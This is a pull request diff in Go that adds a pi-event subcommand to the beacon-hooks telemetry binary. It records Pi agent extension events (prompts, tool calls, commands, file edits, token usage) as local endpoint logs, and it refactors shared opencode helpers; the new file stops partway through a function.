### PR TITLE
Pi support 2/7: pi-event in the hooks binary

### DIFF
--- a/cli/beacon-hooks/cmd/endpoint_events.go
+++ b/cli/beacon-hooks/cmd/endpoint_events.go
@@ -4,6 +4,7 @@ import (
 	"context"
 	"crypto/sha256"
 	"encoding/hex"
+	"encoding/json"
 	"fmt"
 	"os"
 	"os/exec"
@@ -18,6 +19,23 @@ import (
 )
 
 var runInventoryHeartbeatCommand = exec.CommandContext
+
+// normalizedEvent is one endpoint event a runtime payload translated into, before it is written.
+//
+// It exists for the plugin- and extension-driven runtimes, whose payloads are not one-hook-one-event
+// the way a Claude or Cursor hook invocation is: a single opencode `session.diff` or Pi assistant
+// message can carry several distinct things worth recording, and returning a slice keeps that fan-out
+// in the mapping function where it can be tested, rather than in the command that writes the log.
+//
+// Shared rather than per-runtime because the alternative was a second identical struct: the type
+// says "an event to emit", which has nothing runtime-specific in it.
+type normalizedEvent struct {
+	action   string
+	category string
+	severity string
+	message  string
+	fields   map[string]interface{}
+}
 
 func emitHookEvent(logger *logging.Logger, action, category, severity, message string, input map[string]interface{}, fields map[string]interface{}) {
 	if fields == nil {
@@ -478,6 +496,72 @@ func firstToolIntAcross(inputs []map[string]interface{}, keys ...string) (int, b
 		}
 	}
 	return 0, false
+}
+
+// jsonMap returns the first key that holds a nested object, or nil.
+//
+// Runtime payloads spell the same nested object several ways -- tool_input and toolInput, result and
+// details -- so callers pass every accepted key and take the first that is present. Returning nil
+// rather than an empty map matters: the callers distinguish "absent" from "present but empty", and
+// an empty map would make a tool that reported no arguments look like one that reported none needed.
+func jsonMap(input map[string]interface{}, keys ...string) map[string]interface{} {
+	if input == nil {
+		return nil
+	}
+	for _, key := range keys {
+		if value, ok := input[key].(map[string]interface{}); ok {
+			return value
+		}
+	}
+	return nil
+}
+
+// cloneEventFields deep-copies a field map so two events built from one payload cannot alias each
+// other's nested maps.
+//
+// The aliasing is the whole point. Runtimes whose payloads fan out into several events build them
+// from one shared base, and a shallow copy shares every nested map in it: setting gen_ai on the
+// second event also sets it on the first, so the log ends up with two events describing the same
+// content. Marshalling through JSON is the copy that matters here because these maps only ever hold
+// JSON-decoded values, and the shallow fallback keeps a marshal failure from dropping the event
+// entirely.
+func cloneEventFields(input map[string]interface{}) map[string]interface{} {
+	if data, err := json.Marshal(input); err == nil {
+		var out map[string]interface{}
+		if err := json.Unmarshal(data, &out); err == nil {
+			return out
+		}
+	}
+	out := make(map[string]interface{}, len(input))
+	for key, value := range input {
+		out[key] = value
+	}
+	return out
+}
+
+// jsonFloat reads a JSON value that should be a number.
+//
+// Every spelling a decoded payload can present the same number as: float64 from encoding/json,
+// json.Number when a decoder used UseNumber, int from a hand-built map in a test, and a quoted
+// string from a runtime that serializes numbers as text. Runtime-reported cost is the value this
+// exists for, and rejecting the string form would drop it for any runtime that quotes it.
+func jsonFloat(value interface{}) (float64, bool) {
+	switch typed := value.(type) {
+	case float64:
+		return typed, true
+	case int:
+		return float64(typed), true
+	case int64:
+		return float64(typed), true
+	case json.Number:
+		result, err := typed.Float64()
+		return result, err == nil
+	case string:
+		result, err := strconv.ParseFloat(strings.TrimSpace(typed), 64)
+		return result, err == nil
+	default:
+		return 0, false
+	}
 }
 
 func firstNestedString(input map[string]interface{}, key string) string {

--- a/cli/beacon-hooks/cmd/helpers.go
+++ b/cli/beacon-hooks/cmd/helpers.go
@@ -118,6 +118,8 @@ func resolveSessionID(input map[string]interface{}, platform string) string {
 		return hermesFirstString(input, "session_id", "sessionId", "session_key", "task_id")
 	case "opencode":
 		return getFirstStr(input, "session_id", "sessionID")
+	case "pi":
+		return getFirstStr(input, "session_id", "sessionId", "sessionID")
 	default:
 		id, _ := input["session_id"].(string)
 		return id
@@ -164,6 +166,13 @@ func resolveSessionIDWithTranscript(input map[string]interface{}, platform strin
 		return
 	case "opencode":
 		sessionID = getFirstStr(input, "session_id", "sessionID")
+		return
+	case "pi":
+		// Pi writes a session JSONL of its own under ~/.pi/agent/sessions, and the extension
+		// reports that path. It is carried so an operator can correlate a Beacon event with the
+		// runtime's own record; Beacon does not read or upload the file.
+		sessionID = getFirstStr(input, "session_id", "sessionId", "sessionID")
+		transcriptPath = getFirstStr(input, "session_file", "sessionFile", "transcript_path", "transcriptPath")
 		return
 	default:
 		sessionID, _ = input["session_id"].(string)
@@ -233,6 +242,13 @@ func resolveCwd(input map[string]interface{}, platform string) string {
 		if cwd := getFirstStr(input, "cwd", "directory", "worktree"); cwd != "" {
 			return cwd
 		}
+	}
+	if platform == "pi" {
+		// The extension reads ctx.cwd, which Pi guarantees for every event, so this is a single
+		// key rather than a chain of fallbacks. "directory" is accepted because Pi's own session
+		// header spells the same value that way, and an extension reporting the header verbatim is
+		// the obvious thing for someone to write.
+		return getFirstStr(input, "cwd", "directory")
 	}
 	if isDevinLikePlatform(platform) {
 		if cwd := getFirstStr(input, "cwd", "project_dir", "projectDir"); cwd != "" {

--- a/cli/beacon-hooks/cmd/opencode_event.go
+++ b/cli/beacon-hooks/cmd/opencode_event.go
@@ -39,14 +39,6 @@ func runOpenCodeEvent(cmd *cobra.Command, args []string) {
 	outputJSON(emptyResponse)
 }
 
-type opencodeNormalizedEvent struct {
-	action   string
-	category string
-	severity string
-	message  string
-	fields   map[string]interface{}
-}
-
 func opencodeEndpointEvent(input map[string]interface{}, sessionID string) (string, string, string, string, map[string]interface{}) {
 	events := opencodeEndpointEvents(input, sessionID)
 	if len(events) == 0 {
@@ -56,11 +48,11 @@ func opencodeEndpointEvent(input map[string]interface{}, sessionID string) (stri
 	return event.action, event.category, event.severity, event.message, event.fields
 }
 
-func opencodeEndpointEvents(input map[string]interface{}, sessionID string) []opencodeNormalizedEvent {
+func opencodeEndpointEvents(input map[string]interface{}, sessionID string) []normalizedEvent {
 	eventType := getFirstStr(input, "type", "event_type", "hook")
 	fields := opencodeBaseFields(input, sessionID)
-	one := func(action, category, severity, message string, values map[string]interface{}) []opencodeNormalizedEvent {
-		return []opencodeNormalizedEvent{{action: action, category: category, severity: severity, message: message, fields: values}}
+	one := func(action, category, severity, message string, values map[string]interface{}) []normalizedEvent {
+		return []normalizedEvent{{action: action, category: category, severity: severity, message: message, fields: values}}
 	}
 
 	switch eventType {
@@ -92,24 +84,24 @@ func opencodeEndpointEvents(input map[string]interface{}, sessionID string) []op
 		events := one(action, category, "info", opencodeToolMessage(action), fields)
 		return append(events, opencodeFileMutationEvents(input, fields)...)
 	case "message.updated":
-		info := opencodeMap(input, "message_info", "info")
+		info := jsonMap(input, "message_info", "info")
 		if len(info) == 0 {
 			info = opencodeProperties(input)
-			info = opencodeMap(info, "info")
+			info = jsonMap(info, "info")
 		}
 		if getFirstStr(info, "role") != "assistant" {
 			return nil
 		}
 		mergeMap(fields, opencodeAssistantFields(info))
 		severity := "info"
-		if opencodeMap(info, "error") != nil {
+		if jsonMap(info, "error") != nil {
 			severity = "high"
 		}
 		return one("agent.response.completed", "session", severity, "opencode assistant response completed", fields)
 	case "message.part.updated":
-		part := opencodeMap(input, "part")
+		part := jsonMap(input, "part")
 		if len(part) == 0 {
-			part = opencodeMap(opencodeProperties(input), "part")
+			part = jsonMap(opencodeProperties(input), "part")
 		}
 		return opencodePartEvents(fields, part)
 	case "session.created":
@@ -117,7 +109,7 @@ func opencodeEndpointEvents(input map[string]interface{}, sessionID string) []op
 	case "session.deleted":
 		return one("session.ended", "session", "info", "opencode session deleted", fields)
 	case "session.status":
-		status := opencodeMap(opencodeProperties(input), "status")
+		status := jsonMap(opencodeProperties(input), "status")
 		statusType := getFirstStr(status, "type")
 		switch statusType {
 		case "idle":
@@ -131,7 +123,7 @@ func opencodeEndpointEvents(input map[string]interface{}, sessionID string) []op
 	case "session.idle":
 		return one("session.status", "session", "info", "opencode session idle", fields)
 	case "session.error":
-		errorInfo := opencodeMap(opencodeProperties(input), "error")
+		errorInfo := jsonMap(opencodeProperties(input), "error")
 		if len(errorInfo) > 0 {
 			fields["error"] = map[string]interface{}{"type": firstNonEmpty(getFirstStr(errorInfo, "name", "type"), "session_error")}
 		}
@@ -255,12 +247,12 @@ func opencodeModel(input map[string]interface{}) string {
 		model, _ = input["modelInfo"].(map[string]interface{})
 	}
 	if model == nil {
-		model = opencodeMap(opencodeProperties(input), "info")
+		model = jsonMap(opencodeProperties(input), "info")
 	}
 	provider := getFirstStr(model, "providerID", "provider_id", "provider")
 	name := getFirstStr(model, "modelID", "model_id")
 	if name == "" {
-		nested := opencodeMap(model, "model")
+		nested := jsonMap(model, "model")
 		provider = firstNonEmpty(provider, getFirstStr(nested, "providerID", "provider_id", "provider"))
 		name = getFirstStr(nested, "modelID", "model_id", "id", "name")
 	}
@@ -272,8 +264,8 @@ func opencodeModel(input map[string]interface{}) string {
 
 func opencodeToolFields(input map[string]interface{}, completed bool) map[string]interface{} {
 	toolName := opencodeToolName(input)
-	toolInput := opencodeMap(input, "tool_input", "toolInput")
-	toolResponse := opencodeMap(input, "tool_response", "toolResponse")
+	toolInput := jsonMap(input, "tool_input", "toolInput")
+	toolResponse := jsonMap(input, "tool_response", "toolResponse")
 	fields := toolFieldsWithResponse(toolName, toolInput, toolResponse)
 	callID := getFirstStr(input, "call_id", "callID")
 	call := map[string]interface{}{}
@@ -341,7 +333,7 @@ func opencodeToolFields(input map[string]interface{}, completed bool) map[string
 			if duration, ok := firstToolIntAcross([]map[string]interface{}{input}, "duration_ms", "durationMs"); ok {
 				commandFields["duration_ms"] = duration
 			}
-			if metadata := opencodeMap(toolResponse, "metadata"); len(metadata) > 0 {
+			if metadata := jsonMap(toolResponse, "metadata"); len(metadata) > 0 {
 				if exitCode, ok := firstToolIntAcross([]map[string]interface{}{metadata}, "exit", "exit_code", "exitCode", "status"); ok {
 					commandFields["exit_code"] = exitCode
 				}
@@ -378,7 +370,7 @@ func opencodeToolName(input map[string]interface{}) string {
 	if tool := getFirstStr(properties, "tool", "tool_name", "toolName", "permission"); tool != "" {
 		return tool
 	}
-	part := opencodeMap(input, "part")
+	part := jsonMap(input, "part")
 	return getFirstStr(part, "tool")
 }
 
@@ -471,14 +463,14 @@ func opencodeAssistantFields(info map[string]interface{}) map[string]interface{}
 	if len(genAI) > 0 {
 		fields["gen_ai"] = genAI
 	}
-	if errInfo := opencodeMap(info, "error"); len(errInfo) > 0 {
+	if errInfo := jsonMap(info, "error"); len(errInfo) > 0 {
 		fields["error"] = map[string]interface{}{"type": firstNonEmpty(getFirstStr(errInfo, "name", "type"), "assistant_error")}
 	}
 	return fields
 }
 
 func opencodeUsage(input map[string]interface{}) map[string]interface{} {
-	tokens := opencodeMap(input, "tokens")
+	tokens := jsonMap(input, "tokens")
 	usage := map[string]interface{}{}
 	if value, ok := opencodeInt(tokens["input"]); ok {
 		usage["input_tokens"] = value
@@ -489,24 +481,24 @@ func opencodeUsage(input map[string]interface{}) map[string]interface{} {
 	if value, ok := opencodeInt(tokens["reasoning"]); ok {
 		usage["reasoning"] = map[string]interface{}{"output_tokens": value}
 	}
-	cache := opencodeMap(tokens, "cache")
+	cache := jsonMap(tokens, "cache")
 	if value, ok := opencodeInt(cache["read"]); ok {
 		usage["cache_read"] = map[string]interface{}{"input_tokens": value}
 	}
 	if value, ok := opencodeInt(cache["write"]); ok {
 		usage["cache_creation"] = map[string]interface{}{"input_tokens": value}
 	}
-	if value, ok := opencodeFloat(input["cost"]); ok {
+	if value, ok := jsonFloat(input["cost"]); ok {
 		usage["cost_usd"] = value
 	}
 	return usage
 }
 
-func opencodePartEvents(base map[string]interface{}, part map[string]interface{}) []opencodeNormalizedEvent {
+func opencodePartEvents(base map[string]interface{}, part map[string]interface{}) []normalizedEvent {
 	if len(part) == 0 {
 		return nil
 	}
-	fields := cloneOpenCodeFields(base)
+	fields := cloneEventFields(base)
 	partType := getFirstStr(part, "type")
 	switch partType {
 	case "text", "reasoning":
@@ -527,19 +519,19 @@ func opencodePartEvents(base map[string]interface{}, part map[string]interface{}
 		if partType == "reasoning" {
 			action, message = "agent.reasoning", "opencode agent reasoning captured"
 		}
-		return []opencodeNormalizedEvent{{action: action, category: "session", severity: "info", message: message, fields: fields}}
+		return []normalizedEvent{{action: action, category: "session", severity: "info", message: message, fields: fields}}
 	case "tool":
-		state := opencodeMap(part, "state")
+		state := jsonMap(part, "state")
 		status := getFirstStr(state, "status")
 		if status != "completed" && status != "error" {
 			return nil
 		}
-		toolInput := opencodeMap(state, "input")
+		toolInput := jsonMap(state, "input")
 		response := map[string]interface{}{}
 		if output, ok := state["output"]; ok {
 			response["output"] = output
 		}
-		if metadata := opencodeMap(state, "metadata"); len(metadata) > 0 {
+		if metadata := jsonMap(state, "metadata"); len(metadata) > 0 {
 			response["metadata"] = metadata
 		}
 		toolPayload := map[string]interface{}{
@@ -550,8 +542,8 @@ func opencodePartEvents(base map[string]interface{}, part map[string]interface{}
 			"tool_input":    toolInput,
 			"tool_response": response,
 		}
-		if start, ok := opencodeInt(opencodeMap(state, "time")["start"]); ok {
-			if end, ok := opencodeInt(opencodeMap(state, "time")["end"]); ok && end >= start {
+		if start, ok := opencodeInt(jsonMap(state, "time")["start"]); ok {
+			if end, ok := opencodeInt(jsonMap(state, "time")["end"]); ok && end >= start {
 				toolPayload["duration_ms"] = end - start
 			}
 		}
@@ -563,7 +555,7 @@ func opencodePartEvents(base map[string]interface{}, part map[string]interface{}
 				fields["raw"] = mergeNested(fields["raw"], map[string]interface{}{"opencode_tool_error": errText})
 				fields["content"] = retainedContentFields(errText)
 			}
-			return []opencodeNormalizedEvent{{action: "tool.failed", category: "tool", severity: "high", message: "opencode tool failed", fields: fields}}
+			return []normalizedEvent{{action: "tool.failed", category: "tool", severity: "high", message: "opencode tool failed", fields: fields}}
 		}
 		action, category := opencodeToolAction(toolPayload)
 		if action == "file.modified" {
@@ -571,16 +563,16 @@ func opencodePartEvents(base map[string]interface{}, part map[string]interface{}
 				action, category = "tool.completed", "tool"
 			}
 		}
-		return []opencodeNormalizedEvent{{action: action, category: category, severity: "info", message: opencodeToolMessage(action), fields: fields}}
+		return []normalizedEvent{{action: action, category: category, severity: "info", message: opencodeToolMessage(action), fields: fields}}
 	case "retry":
 		fields["error"] = map[string]interface{}{"type": "model_retry"}
-		return []opencodeNormalizedEvent{{action: "model.retry", category: "session", severity: "medium", message: "opencode model retry", fields: fields}}
+		return []normalizedEvent{{action: "model.retry", category: "session", severity: "medium", message: "opencode model retry", fields: fields}}
 	default:
 		return nil
 	}
 }
 
-func opencodeDiffEvents(input map[string]interface{}, base map[string]interface{}) []opencodeNormalizedEvent {
+func opencodeDiffEvents(input map[string]interface{}, base map[string]interface{}) []normalizedEvent {
 	properties := opencodeProperties(input)
 	rawDiff, ok := properties["diff"]
 	if !ok {
@@ -590,7 +582,7 @@ func opencodeDiffEvents(input map[string]interface{}, base map[string]interface{
 	if !ok || len(items) == 0 {
 		return nil
 	}
-	var events []opencodeNormalizedEvent
+	var events []normalizedEvent
 	for _, item := range items {
 		diffItem, ok := item.(map[string]interface{})
 		if !ok {
@@ -607,9 +599,9 @@ func opencodeDiffEvents(input map[string]interface{}, base map[string]interface{
 		if before != "" || after != "" {
 			diffText = fmt.Sprintf("--- before\n%s\n+++ after\n%s", before, after)
 		}
-		fields := cloneOpenCodeFields(base)
+		fields := cloneEventFields(base)
 		mergeMap(fields, diffFields(path, diffText))
-		events = append(events, opencodeNormalizedEvent{
+		events = append(events, normalizedEvent{
 			action: "file.modified", category: "file", severity: "info",
 			message: "opencode session diff observed", fields: fields,
 		})
@@ -617,7 +609,7 @@ func opencodeDiffEvents(input map[string]interface{}, base map[string]interface{
 	return events
 }
 
-func opencodeFileMutationEvents(input map[string]interface{}, base map[string]interface{}) []opencodeNormalizedEvent {
+func opencodeFileMutationEvents(input map[string]interface{}, base map[string]interface{}) []normalizedEvent {
 	command, _ := base["command"].(map[string]interface{})
 	exitCode, ok := opencodeInt(command["exit_code"])
 	if !ok || exitCode != 0 {
@@ -627,7 +619,7 @@ func opencodeFileMutationEvents(input map[string]interface{}, base map[string]in
 	if len(items) == 0 {
 		return nil
 	}
-	var events []opencodeNormalizedEvent
+	var events []normalizedEvent
 	for _, item := range items {
 		mutation, ok := item.(map[string]interface{})
 		if !ok {
@@ -638,14 +630,14 @@ func opencodeFileMutationEvents(input map[string]interface{}, base map[string]in
 		if path == "" {
 			continue
 		}
-		fields := cloneOpenCodeFields(base)
+		fields := cloneEventFields(base)
 		delete(fields, "command")
 		fields["file"] = map[string]interface{}{
 			"path":      path,
 			"operation": operation,
 			"language":  strings.TrimPrefix(filepath.Ext(path), "."),
 		}
-		events = append(events, opencodeNormalizedEvent{
+		events = append(events, normalizedEvent{
 			action: "file.modified", category: "file", severity: "info",
 			message: "opencode file " + operation + " observed", fields: fields,
 		})
@@ -665,7 +657,7 @@ func opencodeApprovalAction(decision string) string {
 }
 
 func opencodePermissionCorrelation(properties map[string]interface{}) map[string]interface{} {
-	toolRef := opencodeMap(properties, "tool")
+	toolRef := jsonMap(properties, "tool")
 	callID := getFirstStr(toolRef, "callID", "call_id")
 	if callID == "" {
 		return nil
@@ -687,23 +679,11 @@ func opencodePermissionCorrelation(properties map[string]interface{}) map[string
 }
 
 func opencodeProperties(input map[string]interface{}) map[string]interface{} {
-	if properties := opencodeMap(input, "properties", "data"); len(properties) > 0 {
+	if properties := jsonMap(input, "properties", "data"); len(properties) > 0 {
 		return properties
 	}
-	event := opencodeMap(input, "event")
-	return opencodeMap(event, "properties", "data")
-}
-
-func opencodeMap(input map[string]interface{}, keys ...string) map[string]interface{} {
-	if input == nil {
-		return nil
-	}
-	for _, key := range keys {
-		if value, ok := input[key].(map[string]interface{}); ok {
-			return value
-		}
-	}
-	return nil
+	event := jsonMap(input, "event")
+	return jsonMap(event, "properties", "data")
 }
 
 func opencodeInt(value interface{}) (int, bool) {
@@ -723,37 +703,6 @@ func opencodeInt(value interface{}) (int, bool) {
 	default:
 		return 0, false
 	}
-}
-
-func opencodeFloat(value interface{}) (float64, bool) {
-	switch typed := value.(type) {
-	case float64:
-		return typed, true
-	case int:
-		return float64(typed), true
-	case json.Number:
-		result, err := typed.Float64()
-		return result, err == nil
-	case string:
-		result, err := strconv.ParseFloat(strings.TrimSpace(typed), 64)
-		return result, err == nil
-	default:
-		return 0, false
-	}
-}
-
-func cloneOpenCodeFields(input map[string]interface{}) map[string]interface{} {
-	if data, err := json.Marshal(input); err == nil {
-		var out map[string]interface{}
-		if err := json.Unmarshal(data, &out); err == nil {
-			return out
-		}
-	}
-	out := make(map[string]interface{}, len(input))
-	for key, value := range input {
-		out[key] = value
-	}
-	return out
 }
 
 func mergeMap(dst, src map[string]interface{}) {

--- a/cli/beacon-hooks/cmd/pi_event.go
+++ b/cli/beacon-hooks/cmd/pi_event.go
@@ -217,6 +217,9 @@ func piToolFields(input map[string]interface{}, completed bool) map[string]inter
 				diffText = firstToolString(toolInput, "content", "new_string", "newString")
 			}
 			mergeMap(fields, diffFields(path, diffText))
+			if file, ok := fields["file"].(map[string]interface{}); ok {
+				file["operation"] = fileOperation(toolName)
+			}
 		}
 	case "command.executed":
 		fields["command"] = piCommandFields(input, toolInput, toolResponse)

--- a/cli/beacon-hooks/cmd/pi_event.go
+++ b/cli/beacon-hooks/cmd/pi_event.go
@@ -1,0 +1,428 @@
+package cmd
+
+import (
+	"encoding/json"
+	"strings"
+
+	hookdiff "github.com/asymptote-labs/agent-beacon/cli/beacon-hooks/internal/diff"
+	"github.com/spf13/cobra"
+)
+
+// Pi (pi.dev) reports through one subcommand rather than one per hook, because it has no hooks
+// configuration to install into: its only observation surface is the TypeScript extension API, so
+// Beacon installs an extension that forwards every event it subscribes to here. That is the same
+// arrangement as the opencode plugin, and it is what keeps the extension a dumb forwarder -- all
+// classification, redaction and schema mapping stays in Go, where it is tested and where a fix
+// reaches already-installed extensions without rewriting them.
+//
+// # Payload contract
+//
+// Both sides of this contract are Beacon's own code, so it is a fixed shape rather than a guess at
+// somebody's API. The extension sends one JSON object on stdin:
+//
+//	type            required; the Pi event name ("session_start", "input", "tool_call", ...)
+//	session_id      Pi's session id, from ctx.sessionManager
+//	cwd             ctx.cwd
+//	model           "<provider>/<model>", from ctx.model
+//	session_file    path to Pi's own session JSONL, for correlation only -- never read
+//	reason          session_start / session_shutdown reason ("startup", "new", "resume", "fork")
+//	prompt          input event: the raw user text
+//	tool_name       tool events: the tool being called
+//	tool_call_id    tool events: Pi's toolCallId, which correlates a call with its result
+//	tool_input      tool events: the arguments object
+//	tool_response   tool_result: the result content
+//	is_error        tool_result: whether Pi reported the tool as failed
+//	duration_ms     tool_result: execution time
+//	usage           message_end: Pi's usage object, verbatim
+//	reasoning       message_end: concatenated thinking-block text
+//	finish_reason   message_end: Pi's stopReason
+//	message_id      message_end: the assistant message id
+//
+// camelCase spellings are accepted alongside snake_case throughout. The extension is TypeScript and
+// forwards several of Pi's objects unchanged, so requiring one casing would mean transforming them
+// in the shim -- more code in the layer that is hardest to test and hardest to update once
+// installed.
+//
+// The response is a JSON object on stdout. Today it is always empty: this command observes and does
+// not decide anything, which is what keeps the open build free of enforcement of its own.
+var piEventCmd = &cobra.Command{
+	Use:   "pi-event",
+	Short: "Record Pi extension telemetry",
+	Long:  `pi-event receives Beacon Pi extension payloads and writes local endpoint telemetry.`,
+	Run:   runPiEvent,
+}
+
+func init() {
+	rootCmd.AddCommand(piEventCmd)
+}
+
+func runPiEvent(cmd *cobra.Command, args []string) {
+	// Running this subcommand *is* the statement that the platform is Pi, so it does not depend on
+	// --platform having been passed correctly. Several shared helpers read platformFlag rather than
+	// taking a parameter -- working-directory resolution, the file-edit tool classifier, the raw
+	// payload echo -- and a stale default would have them disagree with the rest of this command
+	// about which runtime produced the event. The payload-driven override for Cursor hooks sets the
+	// same global for the same reason.
+	platformFlag = "pi"
+
+	input, err := readStdinJSON()
+	if err != nil {
+		// Unparseable stdin is answered with an empty response rather than an error exit. Pi runs
+		// this as a subprocess of an interactive session; a non-zero exit or a missing reply is a
+		// visible failure in the user's terminal, and Beacon losing one event is strictly better
+		// than Beacon making the agent look broken.
+		outputJSON(emptyResponse)
+		return
+	}
+	sessionID := resolveSessionID(input, "pi")
+	logger := newHookLogger("pi-event", "pi", sessionID)
+	for _, event := range piEndpointEvents(input, sessionID) {
+		if event.action == "" {
+			continue
+		}
+		if err := logger.EndpointEvent(event.action, event.category, event.severity, event.message, event.fields); err != nil {
+			logger.Error("Failed to write endpoint event", "error", err.Error(), "action", event.action)
+		}
+	}
+	outputJSON(emptyResponse)
+}
+
+// piEndpointEvents translates one extension payload into the endpoint events it represents.
+//
+// Most Pi events produce exactly one. An assistant message produces two when it carried thinking
+// text, because reasoning is a separate signal with its own action and its own retention decision;
+// folding it into the response event would make one event whose content field describes two
+// different pieces of text.
+func piEndpointEvents(input map[string]interface{}, sessionID string) []normalizedEvent {
+	eventType := getFirstStr(input, "type", "event", "event_type")
+	fields := piBaseFields(input, sessionID)
+	one := func(action, category, severity, message string, values map[string]interface{}) []normalizedEvent {
+		return []normalizedEvent{{action: action, category: category, severity: severity, message: message, fields: values}}
+	}
+
+	switch eventType {
+	case "session_start":
+		return one("session.started", "session", "info", "Pi session started", fields)
+	case "session_shutdown":
+		return one("session.ended", "session", "info", "Pi session ended", fields)
+	case "input":
+		prompt := getFirstStr(input, "prompt", "text", "input")
+		if prompt == "" {
+			return nil
+		}
+		fields["prompt"] = map[string]interface{}{"text": prompt}
+		fields["gen_ai"] = map[string]interface{}{
+			"input": map[string]interface{}{
+				"messages": []interface{}{map[string]interface{}{
+					"role":  "user",
+					"parts": []interface{}{map[string]interface{}{"type": "text", "content": prompt}},
+				}},
+			},
+		}
+		fields["content"] = retainedContentFields(prompt)
+		return one("prompt.submitted", "prompt", "info", "Prompt submitted to Pi", fields)
+	case "tool_call":
+		// A tool_call is recorded as invoked, not as executed, even for a shell tool. Pi fires this
+		// before the tool runs and an extension may still block it, so classifying a shell call as
+		// command.executed here would report a command that never ran.
+		mergeMap(fields, piToolFields(input, false))
+		return one("tool.invoked", "tool", "info", "Pi tool invoked", fields)
+	case "tool_result":
+		mergeMap(fields, piToolFields(input, true))
+		if piIsError(input) {
+			fields["error"] = map[string]interface{}{"type": "tool_error"}
+			return one("tool.failed", "tool", "high", "Pi tool failed", fields)
+		}
+		action, category := piToolAction(input)
+		return one(action, category, "info", piToolMessage(action), fields)
+	case "message_end":
+		return piAssistantEvents(input, fields)
+	case "agent_end":
+		return one("session.status", "session", "info", "Pi agent turn ended", fields)
+	default:
+		// An unrecognized event type is dropped rather than recorded as a generic event. Pi's
+		// extension API has events Beacon does not map (model_select, provider request hooks), and
+		// writing a placeholder for each would fill the log with entries that carry no signal while
+		// still costing the size budget every real event competes for.
+		return nil
+	}
+}
+
+// piBaseFields builds the context every Pi event carries.
+//
+// applyWorkspaceFields rather than emitHookEvent because this payload can produce several events and
+// emitHookEvent writes exactly one; the enrichment it performs -- working directory, repository,
+// branch -- is the part that matters and is shared.
+func piBaseFields(input map[string]interface{}, sessionID string) map[string]interface{} {
+	fields := sessionFields(sessionID, input)
+	applyWorkspaceFields(fields, input, "")
+	fields["raw"] = map[string]interface{}{"pi": input}
+	if model := getFirstStr(input, "model"); model != "" {
+		fields["model"] = model
+	}
+	return fields
+}
+
+// piToolFields maps a tool call or result onto the tool, command, file and MCP fields.
+//
+// completed distinguishes the two: a tool_call has arguments but no result, and only a result can
+// carry an exit code, a diff, or output. Passing the flag rather than inferring it from the presence
+// of tool_response keeps a tool that legitimately returns nothing from being treated as pending.
+func piToolFields(input map[string]interface{}, completed bool) map[string]interface{} {
+	toolName := piToolName(input)
+	toolInput := jsonMap(input, "tool_input", "toolInput", "input", "arguments")
+	toolResponse := jsonMap(input, "tool_response", "toolResponse", "result", "details")
+
+	fields := toolFieldsWithResponse(toolName, toolInput, toolResponse)
+
+	call := map[string]interface{}{}
+	if len(toolInput) > 0 {
+		call["arguments"] = toolInput
+	}
+	if completed && len(toolResponse) > 0 {
+		if output, ok := toolResponse["output"]; ok {
+			call["result"] = output
+		} else {
+			call["result"] = toolResponse
+		}
+	}
+	if callID := getFirstStr(input, "tool_call_id", "toolCallId", "toolCallID", "call_id"); callID != "" {
+		call["id"] = callID
+	}
+	// gen_ai.tool is set unconditionally so a call and its result share a correlatable shape even
+	// when Pi reported neither arguments nor output.
+	fields["gen_ai"] = mergeNested(fields["gen_ai"], map[string]interface{}{
+		"operation": map[string]interface{}{"name": "execute_tool"},
+		"tool": map[string]interface{}{
+			"name": toolName,
+			"call": call,
+		},
+	})
+
+	if duration, ok := firstToolIntAcross([]map[string]interface{}{input}, "duration_ms", "durationMs"); ok {
+		fields["tool"] = mergeNested(fields["tool"], map[string]interface{}{"duration_ms": duration})
+	}
+
+	if !completed {
+		piApplyRetainedToolContent(fields, toolInput, toolResponse)
+		return fields
+	}
+
+	switch action, _ := piToolAction(input); action {
+	case "file.modified":
+		path := piToolPath(toolInput)
+		if path != "" {
+			diffText := hookdiff.FromToolResponse(toolName, toolInput, toolResponse)
+			if diffText == "" {
+				diffText = firstToolString(toolInput, "content", "new_string", "newString")
+			}
+			mergeMap(fields, diffFields(path, diffText))
+		}
+	case "command.executed":
+		fields["command"] = piCommandFields(input, toolInput, toolResponse)
+	}
+
+	piApplyRetainedToolContent(fields, toolInput, toolResponse)
+	return fields
+}
+
+// piApplyRetainedToolContent records the retention marker for the raw tool input and output.
+//
+// Both are retained together under one marker because they are written to the event as one unit; a
+// separate hash per half would describe content the event does not store separately.
+func piApplyRetainedToolContent(fields, toolInput, toolResponse map[string]interface{}) {
+	if len(toolInput) == 0 && len(toolResponse) == 0 {
+		return
+	}
+	encoded, err := json.Marshal(map[string]interface{}{"input": toolInput, "response": toolResponse})
+	if err != nil || len(encoded) == 0 {
+		return
+	}
+	fields["content"] = retainedContentFields(string(encoded))
+}
+
+func piCommandFields(input, toolInput, toolResponse map[string]interface{}) map[string]interface{} {
+	command := map[string]interface{}{}
+	if value := firstToolString(toolInput, "command", "cmd", "script"); value != "" {
+		command["command"] = value
+	}
+	if output, ok := toolResponse["output"]; ok {
+		command["output"] = output
+	}
+	if exitCode, ok := firstToolIntAcross([]map[string]interface{}{toolResponse, input}, "exit_code", "exitCode", "exit", "status"); ok {
+		command["exit_code"] = exitCode
+	}
+	if duration, ok := firstToolIntAcross([]map[string]interface{}{input}, "duration_ms", "durationMs"); ok {
+		command["duration_ms"] = duration
+	}
+	return command
+}
+
+// piAssistantEvents records what an assistant message reported about the model turn.
+//
+// The token usage is the reason this event exists at all: Pi reports per-message usage including
+// cache reads and writes and a runtime-computed cost, which is what feeds the token attribution
+// rollups. Reasoning text, when present, is emitted as its own agent.reasoning event.
+func piAssistantEvents(input map[string]interface{}, base map[string]interface{}) []normalizedEvent {
+	fields := cloneEventFields(base)
+
+	genAI := map[string]interface{}{}
+	response := map[string]interface{}{}
+	if finish := getFirstStr(input, "finish_reason", "finishReason", "stop_reason", "stopReason"); finish != "" {
+		response["finish_reasons"] = []interface{}{finish}
+	}
+	if id := getFirstStr(input, "message_id", "messageId", "id"); id != "" {
+		response["id"] = id
+	}
+	if len(response) > 0 {
+		genAI["response"] = response
+	}
+	if usage := piUsage(input); len(usage) > 0 {
+		genAI["usage"] = usage
+	}
+	if len(genAI) > 0 {
+		fields["gen_ai"] = genAI
+	}
+
+	events := []normalizedEvent{{
+		action: "agent.response.completed", category: "session", severity: "info",
+		message: "Pi assistant response completed", fields: fields,
+	}}
+
+	reasoning := getFirstStr(input, "reasoning", "thinking", "thought")
+	if reasoning == "" {
+		return events
+	}
+	reasoningFields := cloneEventFields(base)
+	reasoningFields["gen_ai"] = map[string]interface{}{
+		"output": map[string]interface{}{"messages": reasoningOutputMessages(reasoning)},
+	}
